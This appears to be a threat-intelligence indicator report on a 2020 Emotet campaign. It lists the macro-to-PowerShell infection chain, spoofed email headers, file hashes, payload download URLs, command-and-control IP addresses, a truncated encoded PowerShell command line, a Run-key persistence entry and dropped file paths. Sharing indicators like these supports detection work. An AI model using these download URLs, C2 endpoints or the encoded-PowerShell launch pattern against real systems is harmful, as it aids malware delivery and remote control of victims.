#emotet_221020

1. #IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
2.  
3. https://pastebin.com/cNb8XhX1
4.  
5. previous_contact:
6. https://pastebin.com/1XfkVE5e
7. https://pastebin.com/F520pqQW
8.  
9. FAQ:
10.  
11. attack_vector
12. --------------
13. email attach .doc > macro > WMI > powershell -enc > GET 8! URL > \Users\%name%\*.exe > C:\Users\%name%\AppData\Local\*\*.exe
14.  
15. email_headers
16. --------------
17. Received: from ns.shimizuya.co.jp (ns.shimizuya.co.jp [210.143.104.170])
18. Received: from [197.221.251.9] (unknown [197.221.251.9])
19. by ns.shimizuya.co.jp (Postfix) with ESMTPA id 13DFA63586
20. Date: Thu, 22 Oct 2020 14:40:57 +0200
21. From: "spoofed_email" <kikaku-toyopridea@shimizuya.co.jp>
22. To: victim@org.com
23. Subject: FW: Надсилання: 1_16_41124-20(09.10.20), Концепція розвитку, Пояснювальна записка, Розпорядження(проект)
24.  
25. files
26. --------------
27. SHA-256 4008f8c88281fb6c543244f1701fb930aa6d1411a3209fcaa2997ee26f977d80
28. File name PO6556850371IW.doc
29. File size 178.00 KB (182272 bytes)
30.  
31. SHA-256 125411ad0784ac4750a1205b97e6a20c905baf5c117a27c4b417590494d80b11
32. File name RMActivate_isv.exe
33. File size 368.00 KB (376832 bytes)
34.  
35. activity
36. **************
37. PL_SCR
38. http://launch.tactikafacewear.com/wp-content/Uk
39. paasologrp.com/parseopmlo/5
40. singohotel.com/dashboardl/Pq
41. mymathlabhomework.com/wp-content/Po
42. https://dietherbsindia.com/assets/k8oo
43. dev-tech.eu/demoshop/P0
44. mithraa.co/nMT
45. chess-pgn.com/win-raid/Pl6T5
46.  
47. C2
48. 200.116.145.225:443
49. 5.196.108.185:8080
50. 167.114.153.111:8080
51.  
52. netwrk
53. --------------
54. launch.tactikafacewear.com GET /wp-content/Uk/ HTTP/1.1
55. 200.116.145.225:443 POST /hCnHn8M/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
56. 5.196.108.185:8080 POST /rWnUmnc/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
57. 167.114.153.111:8080 POST /dQok/1r/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
58. 167.99.105.11:8080 POST /i8Elp07/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
59.  
60. comp
61. --------------
62. powershell.exe 170.10.164.154 443
63. powershell.exe 3.10.134.94 80
64.  
65. RMActivate_isv.exe 200.116.145.225 443
66.  
67. RMActivate_isv.exe 5.196.108.185 8080
68. RMActivate_isv.exe 167.114.153.111 8080
69. RMActivate_isv.exe 212.42.75.240 993
70. RMActivate_isv.exe 167.99.105.11 8080
71.  
72. proc
73. --------------
74. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
75.  
76. [another]
77.  
78. C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
79. C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe -ENCOD IAAkAGoAQwBGAFYAUABiACAAIAA9AFsAVABZAFAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADUAf
80. C:\Users\operator\Qyj9bw1\A5vuovn\Rcrtkr.exe - moved
81. C:\Users\operator\AppData\Local\appmgr\RMActivate_isv.exe
82.  
83. persist
84. --------------
85. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22.10.2020 15:45
86. RMActivate_isv EffectDemo MFC Application
87. c:\users\operator\appdata\local\appmgr\rmactivate_isv.exe 23.10.2020 1:28
88.  
89. drop
90. --------------
91. C:\Users\operator\Qyj9bw1\A5vuovn\Rcrtkr.exe
92. C:\Users\operator\AppData\Local\appmgr\RMActivate_isv.exe
93.  
94. # # #
95. https://www.virustotal.com/gui/file/4008f8c88281fb6c543244f1701fb930aa6d1411a3209fcaa2997ee26f977d80/details
96. https://www.virustotal.com/gui/file/125411ad0784ac4750a1205b97e6a20c905baf5c117a27c4b417590494d80b11/details
97. https://analyze.intezer.com/analyses/10b857fe-3d77-4c66-a92b-46fb82549676
98.  
99. VR